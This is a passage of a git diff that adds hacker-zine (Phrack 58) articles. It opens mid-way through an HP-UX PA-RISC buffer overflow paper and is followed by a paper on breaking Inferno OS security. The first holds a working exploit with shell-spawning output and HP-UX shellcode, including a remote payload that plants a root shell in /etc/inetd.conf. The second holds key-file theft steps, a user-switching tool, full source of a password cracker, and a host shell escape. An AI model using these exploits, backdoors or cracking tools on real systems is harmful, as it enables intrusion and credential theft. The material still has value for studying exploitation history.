+0x32cc <non_leaf+28>:        stw  r19,8(sr0,r3)
+0x32d0 <non_leaf+32>:        ldi 1,r26
+0x32d4 <non_leaf+36>:        b,l 0x3298 <sleep>,rp
+0x32d8 <non_leaf+40>:        nop
+0x32dc <non_leaf+44>:        ldw -14(sr0,r3),rp
+0x32e0 <non_leaf+48>:        ldo 40(r3),sp
+0x32e4 <non_leaf+52>:        ldw,mb -40(sr0,sp),r3
+0x32e8 <non_leaf+56>:        bv,n r0(rp)
+0x32ec <non_leaf+60>:        break 0,0
+End of assembler dump.
+(gdb)
+
+
+--[ 2. Stack organization
+
+  The following stack organization is brought up under PA-RISC 1.1 on a
+HP-UX B10.20 and using the gcc compiler (though i will explain some few
+thing of native cc). I have not seen any documentation about this stuff, so
+it was based on gdb and my deduction ability.
+
+  PA-RISC does not have instructions like "save", "restore" to save the
+registers values in a function prelude as SPARC does. all this stuff is
+implemented via software and changes between compilers.
+
+  We will focus on non-leaf functions that are the ones that get involved
+on buffer overflows. All "non-leaf" functions implements a prelude and a
+final of a funtion, for example in main():
+
+
+        0x3380 <main>:          stw rp,-14(sr0,sp)
+        0x3384 <main+4>:        copy r3,r1
+        0x3388 <main+8>:        copy sp,r3
+        0x338c <main+12>:       stw,ma r1,40(sr0,sp)
+        0x3390 <main+16>:       stw r26,-24(sr0,r3)
+        0x3394 <main+20>:       stw r25,-28(sr0,r3)
+
+        ...
+
+        0x33e0 <main+96>:       ldw -14(sr0,r3),rp
+        0x33e4 <main+100>:      ldo 40(r3),sp
+        0x33e8 <main+104>:      ldw,mb -40(sr0,sp),r3
+        0x33ec <main+108>:      bv,n r0(rp)
+
+
+        We are going to see step by step what is going on:
+
+  - 0x3380 <main>:          stw rp,-14(sr0,sp)
+
+    Store the return address (in %rp after the BL) in %sp-0x14. Native C 
+    compiler stores it in %sp-0x18.    
+
+  - 0x3384 <main+4>:        copy r3,r1
+ 
+    Make a copy of %r3 in %r1. This is because in %r3 will store the %sp 
+    of the previous function, as we will see.
+   
+  - 0x3388 <main+8>:        copy sp,r3
+
+    Copy %sp in %r3.
+
+  - 0x338c <main+12>:       stw,ma r1,40(sr0,sp)
+
+    Stores %r1 (the sp of to back functions) in the stack and increments
+    %sp in 0x40. This 0x40 is because it reserves space for its own local 
+    variables plus 64 bytes for the frame maker and the arguments of the 
+    following function. (Notice the frame maker is of the next function 
+    that is to be called, this is very important!).
+
+  - 0x3390 <main+16>:       stw r26,-24(sr0,r3)
+
+    Copies the first argument (%r26) of the function to stack (space 
+    reserved of the last function), at %r3 (last %sp) - 0x24.
+
+  - 0x3394 <main+20>:       stw r25,-28(sr0,r3)
+    
+    Copies the second argument (%r25) of the fucntion to stack (space
+    reserved of the last function), at %r3 (last %sp) - 0x28.
+
+    Like the last two instructions mechanism, the first four arguments 
+    will be stored (%r26-%r23). In case there are more than four arguments
+    before the jmp to the function is done they will be store in stack
+    where they fit.
+
+    F.e.   arg4 ---> %r3 - 52
+           arg5 ---> %r3 - 56
+           arg6 ---> %r3 - 60
+           ...
+
+  So the stack organization will look like this:
+
+
+                 |                         |
+                 --------------------------- %sp    \
+                 |                         |        |
+                 |                         |        |
+                 |                         |        | 
+                 |                         |        | 
+                 |                         |        |
+                 |                         |        | Space reserved  
+                 |                         |        | for the Frame Maker
+                 |                         |        | and the arguments
+                 |                         |        | of the following
+                 |                         |        | function.
+                 |                         |        | Always 64 bytes.
+                 |                         |        | 
+                 |                         |        | 
+                 |                         |        |
+                 |                         |        |
+                 |                         |        |
+                 ---------------------------       /
+                 |                         |       \
+                 |                         |        | Space reserved for
+                             ...                    | the local variables
+                 |                         |        | of the function
+                 |                         |        | + 4 bytes (%r1) 
+                 |           %r1           |       /
+                 --------------------------- %r3   \
+         -4      |                         |        |
+         -8      |                         |        |
+         -12     |                         |        | Frame Maker of the
+         -16     |                         |        | current function
+         -20     |       %r2 (%rp) gcc     |        | 
+         -24     |       %r2 (%rp) cc      |        |
+         -28     |                         |        |
+         -32     |                         |       /
+         -36     |       arg1 = %r26       |       \
+         -40     |       arg2 = %r25       |        |
+         -44     |       arg3 = %r24       |        | Space reserved
+         -48     |       arg4 = %r23       |        | for the arguments 
+         -52     |       arg5              |        | of the current
+         -56     |       ...               |        | function
+         -60     |                         |        | 
+         -64     |                         |        |
+                 ---------------------------       /
+                 |                         |
+
+  With this usefull information, if a buffer overflow happens in stack and
+we overflow a local variable of a function, we will overwrite the Frame
+Maker of the next function called. This "next function" used to be the
+function that makes the copy of the buffer, f.e. strcpy(), sprintf() etc. 
+
+  This is why the following program could not be exploited because there is
+not a "next function" that copies the buffer, because we copy the buffer
+with a while.
+
+
+  void vulnerable_func(char *buffer) {
+  char buffer2[128];
+  int counter=0;
+
+     while(buffer[counter]!='\0') {
+      buffer2[counter]=buffer[counter];
+      counter++;
+     }
+
+   printf("Buffer: %s\n",buffer);
+  }
+
+  int main(int argc, char **argv) {
+
+   vulnerable_func(argv[1]);
+  }
+
+
+  In the end part of each function we undo all the operations we have seen:
+read %rp from stack, restore %sp and %r3 and branches to %rp.
+
+
+--[ 3. Advanced Buffer Overflow #2
+
+In the following web page:
+
+  http://community.core-sdi.com/~gera/InsecureProgramming/
+
+there are some programs vulnerable to many types of bugs such as buffer
+overflow, heap overflow, format string bugs, ...
+
+  We will focus in the Advance Buffer Overflow #2 (abo2.c) which gave many
+people headaches.
+
+
+HP9000:~/overflows/sample$ cat abo2.c
+/* abo2.c                                                    *
+ * specially crafted to feed your brain by gera@core-sdi.com */
+
+/* This is a tricky example to make you think                *
+ * and give you some help on the next one                    */
+
+ int main(int argv,char **argc) {
+    char buf[256];
+
+    strcpy(buf,argc[1]);
+    exit(1);
+    } 
+HP9000:~/overflows/sample$
+
+  Many people say that "its exploitation is not possible". I go further
+saying "its exploitation is not possible in x86 architectures", but in
+others like PA-RISC it can be exploitable.
+
+  In x86 platforms, by supplying a buffer long enough, you will overwrite
+the return address of main(), but due to the uneludable exit() we will
+never have the control of the flow of the vulnerable program. Better said:
+"I have not been able to have control of it ;P"
+
+  We have to find a way to control the flow of our program before exit() is
+executed. Under HP-UX10.20/PA-RISC, because stack (%r30 or %sp) grows from
+lower address to higher address (against some other architectures do such
+as Linux x86) and also due to the stack organization explained in this
+document, we will not overwrite the return address of main() but we will
+overwrite the return address of strcpy(). So once the buffer is copied, and
+once strcpy branches to its own %rp, it will go to our shellcode having
+control of the flow of the program before exit() is executed.
+   
+  All this is due to strcpy(), is implemented, under HP-UX B.10.20 as a
+non-leaf funtion (it will store its own return pointer in stack). Fyodor
+Yarochkin told me that strcpy() under HP-UX 11.00 is implemented as a leaf
+funtion, so this particular overflow will not be exploitable on that
+version of HP-UX. 
+
+  I am not saying strcpy()'s overflows are not posible to exploit under
+HP-UX 11.00. Take a look at this piece of code and find why it is still
+possible.
+
+HP9000:~/overflows/hp11-strcpy$ cat hp11-strcpy.c  	
+void foo(char *buff,char *dest) {
+  strcpy(dest,buff);
+}
+
+int main(int argc, char **argv) { 
+  char buffer[128];
+
+  foo(argv[1],buffer);
+}
+HP9000:~/overflows/hp11-strcpy$
+
+
+Proof of concept:
+
+HP9000:~/overflows/sample$ uname -a
+HP-UX HP9000 B.10.20 A 9000/712 2013496278 two-user license 
+HP9000:~/overflows/abo2$ cat abo2.c
+/* abo2.c                                                    *
+ * specially crafted to feed your brain by gera@core-sdi.com */
+  
+/* This is a tricky example to make you think                *
+ * and give you some help on the next one                    */
+ 
+ int main(int argv,char **argc) {
+    char buf[256];
+     
+    strcpy(buf,argc[1]);  
+    exit(1);
+    }
+HP9000:~/overflows/abo2$
+
+HP9000:~/overflows/abo2$ cat xploit.c
+/*
+ * abo2.c xploit by Zhodiac <zhodiac@softhome.net>
+ *
+ * http://community.core-sdi.com/~gera/InsecureProgramming/  
+ * 
+ * Xploited on HPUX
+ * 9/9/2001
+ * 
+ * Madrid
+ *
+ */
+#include <stdio.h>
+    
+//#define NOP 0x3902800b
+#define NOP 0x08630243
+#define BUFFSIZE 256+48+1 
+#define NUMADDR 10
+#define OFFSET -80
+  
+char shellcode[] =
+"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
+"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
+"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe"
+"/bin/sh\xff";
+
+long get_sp(void) {
+   __asm__("copy %sp,%ret0 \n");
+}
+  
+int main(int argc, char *argv[]) {
+char buffer[BUFFSIZE];
+char *ch_ptr;
+unsigned long addr,offset=OFFSET;
+int aux;
+
+ if (argc==2) offset=atoi(argv[1]);
+
+ addr=get_sp()+offset;
+
+ memset(buffer,0,sizeof(buffer));
+ ch_ptr=(char *)buffer;
+
+ for (aux=0; aux<(BUFFSIZE-strlen(shellcode)-NUMADDR*4)/4; aux++) {
+      *(ch_ptr++)=(NOP>>24)&255;
+      *(ch_ptr++)=(NOP>>16)&255;
+      *(ch_ptr++)=(NOP>>8)&255;
+      *(ch_ptr++)=NOP&255;
+      }
+
+ memcpy(ch_ptr,shellcode,strlen(shellcode));
+ ch_ptr+=strlen(shellcode);
+ for (aux=0; aux<NUMADDR; aux++) {
+     *(ch_ptr++)=(addr>>24)&255;
+     *(ch_ptr++)=(addr>>16)&255;   
+     *(ch_ptr++)=(addr>>8)&255;
+     *(ch_ptr++)=addr&255;
+     }
+ 
+ buffer[BUFFSIZE-1]='\0';
+ printf("Return Address %#x\n",addr);
+ printf("Buffer Size: %i\n",strlen(buffer));
+      
+ if (execl("./abo2","abo2",buffer,NULL)==-1) {
+    printf("Error at execl()\n");
+    exit(-1);
+    }  
+
+}
+HP9000:~/overflows/abo2$ 
+ 
+HP9000:~/overflows/abo2$ gcc -o xploit xploit.c
+HP9000:~/overflows/abo2$ gcc -o abo2 abo2.c
+     
+HP9000:~/overflows/abo2$ ./xploit
+Return Address 0x7b03a5b0
+Buffer Size: 304
+$ uname -a
+HP-UX HP9000 B.10.20 A 9000/712 2013496278 two-user license
+$ exit
+HP9000:~/overflows/abo2$
+
+
+--[ 4. Extras
+
+  Here are two shellcodes for HP-UX. First is a local one, it just executes
+a /bin/sh but notice its reduced size, only 47 bytes. Second one was, in
+its development time, the first remote shellcode I know about. It uses
+inetd to put a shell on a tcp port. There is a third shellcode which
+implements all syscalls socket(), bind(), dup2() but I lost it. Shit
+happens (Also fsck does also). :(
+
+
+--[ 4.1. Local Shellcode
+   
+  Nowadays there are some HP-UX shellcode (Fyodor's home some developed,
+lsd-pl some more), but in its development time the only one public was the
+one of K2 of ADM. This shellcode is a bit optimized, because it is 13
+bytes lower in size.
+
+
+/*
+ * HP-UX 47 bytes shellcode
+ *
+ *    By Zhodiac <zhodiac@softhome.net>
+ *
+ * Madrid, 13/05/2001
+ *
+ */
+
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd"      /*              bl salto,%r1               */
+"\x0b\x39\x02\x99"      /* salto:       xor %r25,%r25,%r25         */
+"\x34\x02\x04\xc0"      /*              ldi 0x260,%r2              */
+"\x08\x41\x04\x03"      /*              sub %r1,%r2,%r3            */
+"\x60\x79\x05\x08"      /*              stb %r25,0x284(%sr0,%r3)   */
+"\xb4\x7a\x04\xfa"      /*              addi 0x27D,%r3,%r26        */
+"\x0b\x18\x02\x98"      /*              xor %r24,%r24,%r24         */
+"\x20\x20\x08\x01"      /*              ldil L'0xC0000004,%r1      */
+"\xe4\x20\xe0\x08"      /*              ble R'0xC0000004(%sr7,%r1) */
+"\x94\x56\x05\x36"      /*              subi 0x29b,%r2,%r22        */
+"/bin/sh";
+
+
+--[ 4.2. Remote Shellcode
+
+/*
+ * HP-UX remote shellcode
+ *
+ *    By Zhodiac <zhodiac@softhome.net>
+ *
+ * Madrid, 14/05/2001
+ *
+ */
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd"      /*              bl salto,%r1               */
+"\x0b\x39\x02\x99"      /* salto:       xor %r25,%r25,%r25         */
+"\x34\x02\x04\xc0"      /*              ldi 0x260,%r2              */
+"\x08\x41\x04\x03"      /*              sub %r1,%r2,%r3            */
+"\x60\x79\x05\x78"      /*              stb %r25,0x2BC(%sr0,%r3)   */
+"\x60\x79\x05\x7e"      /*              stb %r25,0x2BF(%sr0,%r3)   */
+"\x68\x79\x05\x62"      /*              stw %r25,0x2AE(%sr0,%r3)   */
+"\xb4\x7a\x05\x6A"      /*              addi 0x2B5,%r3,%r26        */
+"\x0f\x5a\x12\x81"      /*              stw %r26,-16(%sr0,%r26)    */
+"\x94\x44\x04\xd0"      /*              subi 0x268,%r2,%r4         */
+"\x0b\x44\x06\x04"      /*              add %r4,%r26,%r4           */
+"\x0f\x44\x12\x89"      /*              stw  %r4,-12(%sr0,%r26)    */
+"\x94\x44\x04\xd6"      /*              subi 0x26C,%r2,%r4         */
+"\x0b\x44\x06\x04"      /*              add %r4,%r26,%r4           */
+"\x0f\x44\x12\x91"      /*              stw  %r4,-8(%sr0,%r26)     */
+"\xb7\x59\x07\xe1"      /*              addi -16,%r26,%r25         */
+"\x0b\x18\x02\x98"      /*              xor %r24,%r24,%r24         */
+"\x20\x20\x08\x01"      /*              ldil L'0xC0000004,%r1      */
+"\xe4\x20\xe0\x08"      /*              ble R'0xC0000004(%sr7,%r1) */
+"\x94\x56\x05\x36"      /*              subi 0x29b,%r2,%r22        */
+"AAAA"
+"BBBB"
+"CCCC"
+"ZZZZ"
+"/bin/sh -c echo \"eklogin stream tcp nowait root /bin/sh sh -i\" >> "
+"/etc/inetd.conf ; /usr/sbin/inetd -c ; ";
+
+
+--[ 5. References
+
+For further information you may consult:
+
+ [1]  Some PDFs i found at http://www.freelsd.net/~ndubee/ (Great 
+      collection :) and http://docs.hp.com/
+      * PA-RISC 1.1 Architecture and Instruction Set Reference Manual
+      * PA-RISC Architecture and Instruction Set Reference Manual
+      * http://www.devresource.hp.com/partner/rad.10.20.pdf
+      * http://www.devresource.hp.com/partner/rad.11.0.32.pdf
+
+ [2]  PA-RISC 2.0 Architecture
+      Gerry Kane
+      ISBN 0-13-182734-0
+
+ [3]  Buffer overflow on non-intel platforms (BlackHat 2001 Asia) 
+      Fyodor Yarochkin. 
+      http://www.notlsd.net/bof/index.html
+
+ [4]  lsd-pl HP-UX shellcodes (You people, are really good! Hope to talk 
+      to you in future!)
+      http://lsd-pl.net
+
+ [5]  You can mail me with any doubt you have :) 
+      Zhodiac <zhodiac@softhome.net>
+
+
+--[ 6.- Greetings
+
+     - [CrAsH], without her support this document would not exist. :***
+     - DarkCode for long long time talking about SPARC and PA-RISC 
+          archs :)
+     - Fyodor Yarochkin for the few, but great, chats we had about 
+          PA-RISC. For the review of this paper. Thx. 
+     - El Nahual for having fun in real and net-life ;P I owe you a mail. 
+     - 0xdeadcafe mail-list for great discussion topics.
+
+
+Madrid 11/10/2001
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/12.txt b/phrack58/12.txt
new file mode 100644
index 0000000..6ccc0dc
--- /dev/null
+++ b/phrack58/12.txt
@@ -0,0 +1,551 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x0c of 0x0e
+
+|=------------------=[ The Security of Inferno OS ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ dalai <dalai@swbt.net> ]=-----------------------=|
+
+
+  This paper goes over the security semantics of Vita Nuova's Inferno OS,
+and some means by which they may be circumvented. Inferno is a small,
+embedded OS intended to run on devices which may take advantage of its
+distributed aspects. The example Bell Labs likes to use is the T.V.
+set-top box. Anything which relies on remote data to run is an Inferno
+candidate. Other potential uses include networked PDA's, and local
+broadband access hubs (ie for cablemodem, or ION).
+
+  This paper is about security and is not an introduction to Inferno. The
+Inferno Documents and man pages have been made available for public
+consumption and are located at Vita Nuova's website,
+http://www.vitanuova.com. Also, notice the change with my email address.
+Insomnia.org get's DoS'd so they shut out their users. Go figure.
+
+  Lucent has mentioned their intent to utilize Inferno in some of it's up
+and coming products. Firewalls and routers are already being built with
+Inferno, and potential future use includes telecom equipment, and
+dedicated(cheap) Internet terminals. Some outside companies are also taking
+interest in Inferno, but noone can predict how much it will be used in the
+future, or how successful it will be.
+
+  There are many reasons why you'd enjoy playing with Inferno. If it gains
+the market saturation that Vita Nuova hopes for, you will have a vast
+network of devices to play with. The industry hopes to 'e-nable'(tm) nearly
+everything that runs off of power. Vehicles, large household appliances,
+probably even toasters will shortly require some kind of embedded OS to
+drive their superfluous hardware. Inferno is one of the answers, and
+probably the most robust.
+
+
+  90% of anything mentioning Inferno and security in the same context talks
+about the encryption and authentication of network messages. This is all
+fine and dandy, but there's much more to be considered, especially in an
+internetworked OS. And Inferno is about networking. There is little point
+in a stand alone host.
+
+  And thus networking Inferno is fundamental. Here's a little info to get
+your hosts up and talking, preferably to another Inferno-based machine.
+
+  The services to be run by Inferno upon execution of the server binary,
+'lib/srv', are contained in /services/server/config. By default the file
+contains these services:
+
+        styx            6666/tcp                # Main file service
+        mpeg            6667/tcp                # Mpeg stream
+        rstyx           6668/tcp                # Remote invocation
+        infdb           6669/tcp                # Database connection
+        infweb          6670/tcp                # inferno web server
+        infsigner       6671/tcp                # inferno signing services
+        infcsigner      6672/tcp                # inferno signing services
+        inflogin        6673/tcp                # inferno login service
+        virgil          2202/udp        virgild # inferno info
+
+  The file /services/cs/services functions as the Unix /etc/services, and
+can be used to reference the above service names with port numbers.
+'netstat' does for Inferno something similar to what it does for Unix. If
+run under a Unix, copy the contents of /services/cs/services to your
+/etc/services file.
+
+  In order for Inferno to successfully talk to other hosts you must start
+the connection server, 'lib/cs'. This daemon translates network names(in
+the form of protocol!host!port) into a namespace network presence. You can
+specify the services 'lib/srv' is to run by editing the file
+/services/server/config.
+
+
+  You can get two hosts up and talking with these steps, assuming that the
+hosting OS' are connected and can communicate. Hostname translation, IP
+interface selection, and etc. is decided upon by the hosting OS.
+
+
+  1. DNS: 'echo ip.of.dns.server > /services/dns/db', rebuild
+          /services/dns/db. There's an example already in there.
+
+  2. CS: edit /services/cs/db, then 'lib/cs'
+
+  3. SRV: edit /services/server/config, then 'lib/srv' (Run on server)
+
+  4. LOGINS: Run 'changelogin <user>' on the server, this must be done for
+             each user who will be logging in.
+
+  5. KEYS: Run 'getauthinfo default' on the hosts to create the initial
+	   certificates. Do this for both the server and the client. Do
+	   'getauthinfo <server>' on the client. Note that this is for the
+	   default certificate. To get one for use with a particular ip, do
+           'getauthinfo tcp!hostname'.
+
+  6. DONE: You may then use the Inferno network services, for instance you
+           may mount a remote computer under your namespace:
+
+           'mount tcp!host /n/remote'
+		
+           to verify:
+           'lc /n/remote/'
+
+           or:
+           'netstat'
+
+
+  And it's that easy folks. You may want your 'lib/cs', 'lib/srv', and
+mount commands to be done automatically at boot. The 'mount' is just an
+example, there's an infinite number of things you can do with your two
+hosts. You may even opt to mobilize your lego's[1]. Read the man pages.
+
+
+                                   *****
+
+
+  Because of the design of Inferno, and the way it is meant to be applied,
+security can be easily circumvented, yielding unauthorized access on remote
+machines, and access to files on the current machine that you shouldn't be
+able to touch.
+
+  I should say something about hosted Inferno before I forget. Because it
+will rely on the hosting OS' IP mechanism's, the sockets created by Inferno
+will behave under pressure as one created by the host. While a tcp
+connect() scan will dirty up the Inferno console with messages, if the host
+OS is Win32 and someone's invoked 'nmap -sF' against it then Inferno's
+services will be invisible along with Windows'. Likewise, all normal system
+logging still applies to the ports Inferno is using. Understand?
+
+  The OS uses a virtual machine model to run its executables, which are
+typically coded in the Inferno specific language Limbo. The virtual machine
+Dis is secured by the virtue of type checking. Perms under inferno are like
+those in Unix. 'ls -l' will show you what I mean. Unlike Unix, namespace
+resources created by a private application are not by default made
+available to anyone else except the children of that process. Thus we see
+that The Labs have put some effort into securing Inferno.
+
+  Cryptography is integrated into the OS. Messages exchanged between two
+Inferno hosts can be encrypted, or authenticated and plaintext. It's built-
+in cryptographic algorithms are, according to the manual:
+
+
+    - SHA/MD5 hash
+    - Elgamal public key for signature systems
+    - RC4
+    - DES
+    - Diffie-Hellman for key exchange
+
+
+  Authentication relies on the public-key aspects of the above. Isn't that
+super? He who believes cryptography is the end-all of security measures is
+sad indeed. Call me lame or whatever, I'm just not interested in crypto.
+
+  Here I will share with you my techniques for upping your enjoyment of
+Inferno. Check it out, no smoke or mirrors. No strings. If you have console
+access you have the Inferno, so all of my stuff may be done via remote
+login, you can do the Windows thing both locally and remotely in the case
+of 95/98. Test boxes follow the suggested installation perm's.
+
+  1) Windows
+
+  If the Inferno is hosted on Windows 95/98, it won't even try to protect
+key files.  Even if it did, we could just grab what we wanted from Windows,
+with the default path to the Inferno namespace being C:\USERS\INFERNO.
+Observe.
+
+        stacey; cat /dev/user
+        inferno
+        stacey; mount tcp!jessica /n/remote
+        stacey; cd /n/remote/usr/dalai/keyring
+        stacey; lc
+        default
+        stacey; cp default /usr/inferno
+        stacey;
+
+  And then we can login as dalai from a third party box, or log into the
+Window's machine's server. Not as big a deal as it seems, considering how
+Inferno is supposed to be run. We can also use this to get the password
+file, /keydb/password.
+
+
+  2) clogon
+
+  Attached is my command line port of the GUI login utility provided by
+Inferno in the distribution. I call it clogon. Now you can't say I've never
+done anything for you.  This does basically the same thing as wm/logon, but
+is done from the text mode console. Inferno will allow you to switch your
+user name once per session.
+
+        stacey; cat /dev/user
+        inferno
+        stacey; ./clogon -u dalai
+        stacey; cat /dev/user
+        dalai
+        stacey; 
+
+
+  3) hellfire
+
+  Hellfire is my Inferno password cracker. The password file is located
+under /keydb/password, and contains the list of users which will be logging
+in remotely to the machine. The Hellfire source can be found below, or at
+the Trauma Inc. page.
+
+       jessica; hellfire -d dict -u luser
+
+       hellfire, by dalai(dalai@swbt.net)
+       A Traumatized Production.
+       Cracking...
+
+       Password is "victim"
+       Have a nice day.
+       jessica;
+
+
+  You don't need that password for the local machine, however you may use
+it in conjunction with luser's keys to gain his access to a remote machine.
+And it will work the same way with more mundane distributed services. The
+day the utility companies rely on Inferno is the day I hook my computer up
+to the washer and dryer.
+
+
+                                   ******
+
+
+  Inferno may run stand alone, or hosted on another OS(Plan9, Win32,
+several Unix's). When hosted, there are quite often opportunities not only
+to hack Inferno from the host, but also the host from Inferno.
+
+  By default the Inferno emulator(emu) is started with no login prompt.
+This is fine for me, because I use my host OS's login to get into Inferno.
+You can have Inferno run a specified program via the emu command line, and
+thus enable selective login.
+
+  For starters, we can execute a command on the host OS as follows:
+
+        stacey; bind -a '#C' /
+        stacey; os '/bin/sh -i'
+        devcmd: /bin/sh -i pid 12600
+        sh: no job control in this shell
+        sh-2.03$
+
+
+  You have the perm's given to the user and group that Inferno was
+installed under, the suggested is user 'Inferno' and group 'inf'. The
+manual says that if some careless person started Inferno as root, 'os' will
+run as the caller's Inferno username. If that username does not exist on
+the hosting system, then 'cmd' will run as user/nobody.
+
+  Yes, I'm thinking what you're thinking. According to the manual, IF
+Inferno is installed under root, AND you change your Inferno user name to
+that of another user on the host OS, THEN you will become that user on the
+host. But what if that user doesn't have an account on the Inferno? With a
+minor modification clogon will allow you to be whatever user you choose,
+you may use any name at all.
+
+  Note that on Window's systems the 'os' argument must be a binary
+executable in the current path. Things built into the regular Windows
+interpreter(command) won't work. Like Unix, the command is run under the
+same user id that started emu.  Also, you can make a dos/windows/iso9660 fs
+visible under Inferno.
+
+
+                                   ******
+
+
+  After becoming curious with Inferno, I downloaded and played with it for
+awhile.  I became interested enough to write this paper, and i'm overall
+satisfied with the system.  Who knows, I may even use it in some upcoming
+projects. If you like the syntax and feel of Inferno but want a more
+production-type OS, see Plan9.
+
+
+Notes:
+
+[1] - Styx on a Brick: http://www.vitanuova.com/inferno/lego1.html
+
+
+------------------------------ clogon.b ------------------------------------
+
+# clogon
+# port of wm/logon to the command line
+#
+# dalai(dalai@swbt.net)
+# http://www.swbt.net/~dalai
+
+implement clogon;
+
+include "sys.m";
+	sys: Sys;
+
+include "draw.m";
+
+include "sh.m";
+include "newns.m";
+
+clogon: module
+{
+	init:	fn(nil: ref Draw->Context, argv: list of string);
+};
+
+init(nil: ref Draw->Context, argv: list of string)
+{
+	sys = load Sys Sys->PATH;
+	sys->print("clogon, by dalai(dalai@swbt.net)\n");
+
+	sys->pctl(sys->FORKNS|sys->FORKFD, nil);
+
+	progdir := "#p/" + string sys->pctl(0, nil);
+	kfd := sys->open(progdir+"/ctl", sys->OWRITE);
+	if(kfd == nil) {
+		sys->sprint("cannot open %s:  %r", progdir+"/ctl");
+		sys->raise("fail:bad prog dir");
+	}
+
+	usr := "";
+	if(argv != nil) {
+		argv = tl argv;
+		if(argv != nil && hd argv == "-u") {
+			argv = tl argv;
+			if(argv != nil) {
+				usr = hd argv;
+				argv = tl argv;
+			}
+		}
+	}
+
+	if (usr == nil || !logon(usr)) {
+		sys->print("usage: clogon -u user\n");
+	}
+
+	(ok, nil) := sys->stat("namespace");
+
+	if(ok >= 0) {
+		ns := load Newns Newns->PATH;
+		if(ns == nil)
+			sys->print("failed to load namespace builder\n");
+		else if ((nserr := ns->newns(nil, nil)) != nil){
+			sys->print("error in user namespace file: %s", nserr);
+			sys->print("\n");
+		}
+	}
+	sys->fprint(kfd, "killgrp");
+	errch := chan of string;
+	spawn exec(argv, errch);
+	err := <-errch;
+	if (err != nil) {
+		sys->fprint(stderr(), "logon: %s\n", err);
+		sys->raise("fail:exec failed");
+	}
+}
+
+exec(argv: list of string, errch: chan of string)
+{
+	sys->pctl(sys->NEWFD, 0 :: 1 :: 2 :: nil);
+	e := ref Sys->Exception;
+	if (sys->rescue("fail:*", e) == Sys->EXCEPTION) {
+		sys->rescued(Sys->ONCE, nil);
+		exit;
+	}
+
+	argv = "/dis/sh/sh.dis" :: "-i" :: "-n" :: nil;
+	cmd := load Command hd argv;
+	if (cmd == nil) {
+		errch <-= sys->sprint("cannot load %s: %r", hd argv);
+	} else {
+		errch <-= nil;
+		cmd->init(nil, argv);
+	}
+}
+
+logon(user: string): int
+{
+	userdir := "/usr/"+user;
+	if(sys->chdir(userdir) < 0) {
+		sys->print("There is no home directory for that user mounted on this machine\n");
+		return 0;
+	}
+
+	#
+	# Set the user id
+	#
+	fd := sys->open("/dev/user", sys->OWRITE);
+	if(fd == nil) {
+		sys->print("failed to open /dev/user: %r\n");
+		return 0;
+	}
+	b := array of byte user;
+	if(sys->write(fd, b, len b) < 0) {
+		sys->print("failed to write /dev/user with error: %r\n");
+		return 0;
+	}
+
+	return 1;
+}
+
+stderr(): ref Sys->FD
+{
+	return sys->fildes(2);
+}
+
+------------------------------ clogon.b ------------------------------------
+
+
+------------------------------ hellfire.b ----------------------------------
+
+# hellfire.b : /keydb/password decoder
+#
+# by: dalai(dalai@swbt.net)
+# http://www.swbt.net/~dalai
+
+
+implement hellfire;
+
+
+include "sys.m";
+	sys: Sys;
+include "draw.m";
+	draw: Draw;
+include "bufio.m";
+	bufio: Bufio;
+	Iobuf: import bufio;
+include "string.m";
+	str: String;
+include "arg.m";
+	arg: Arg;
+include "keyring.m";
+	keyring: Keyring;
+include "security.m";
+	pass: Password;
+
+
+hellfire: module
+{
+	init: fn(ctxt: ref Draw->Context, argv: list of string);
+	usage: fn();
+	finish: fn(temp: array of byte);
+};
+
+init(nil: ref Draw->Context, argv: list of string)
+{
+	sys = load Sys Sys->PATH;
+	draw = load Draw Draw->PATH;
+	bufio = load Bufio Bufio->PATH;
+	str = load String String->PATH;
+	arg = load Arg Arg->PATH;
+	pass = load Password Password->PATH;
+	keyring = load Keyring Keyring->PATH;
+
+	sys->print("\nhellfire, by dalai(dalai@swbt.net)\n");
+	sys->print("A Traumatized Production.\n");
+
+	if(argv == nil)
+		usage();
+
+	dfile := pfile := uid := "";
+	arg->init(argv);
+
+	while((tmp := arg->opt()) != 0)
+		case tmp{
+			'd' => dfile = arg->arg();
+			'u' => uid = arg->arg();
+			* => usage();
+		}
+
+	if(dfile == nil || uid == nil)
+		usage();
+
+	dfd := bufio->open(dfile, bufio->OREAD);
+
+	if(dfd == nil){
+		sys->print("Could not open %s.\n", dfile);
+		exit;
+	}
+
+	pw := pass->get(uid);
+	if(pw == nil){
+		sys->print("Could not get entry for %s.\n", uid);
+		exit;
+	}
+
+	sys->print("Cracking...\n\n");
+
+	pwbuff2 := array[keyring->SHAdlen] of byte;
+	pwbuff := array[keyring->SHAdlen] of byte;
+
+	# try some common passwords
+	for(n := 1; n < 4; n++){
+		if(n == 1)
+			pwbuff = array of byte "password";
+		if(n == 2)
+			pwbuff = array of byte uid;
+		if(n == 3)
+			pwbuff = array of byte "";
+
+		keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);
+
+		temp1 := string pwbuff2;
+		temp2 := string pw.pw;
+
+		if(temp2 == temp1){
+			finish(pwbuff);
+		}
+	}
+
+	# if not, try the dictionary
+	for(dentry := "" ; ;){
+		dentry = dfd.gets('\n');
+			if(dentry == nil)
+				break;
+
+		if(dentry[len dentry-1] == '\n'){
+			heh := "";
+			(heh, nil) = str->splitl(dentry, "\n");
+			dentry = heh;
+		}
+
+		pwbuff = array of byte dentry;
+		keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);
+
+		temp1 := string pwbuff2;
+		temp2 := string pw.pw;
+
+		if(temp2 == temp1){
+			finish(pwbuff);
+		}
+	}
+
+	sys->print("done.\n");
+	sys->print("Have a nice day.\n");
+	exit;
+}
+
+finish(pwbuff: array of byte)
+{
+	sys->print("Password is \"%s\"\n", string pwbuff);
+	sys->print("Have a nice day.\n");
+	exit;
+}
+
+usage()
+{
+	sys->print("usage: hellfire -d dictionary -u user\n");
+	exit;
+}
+
+----------------------------- hellfire.b ----------------------------------
+
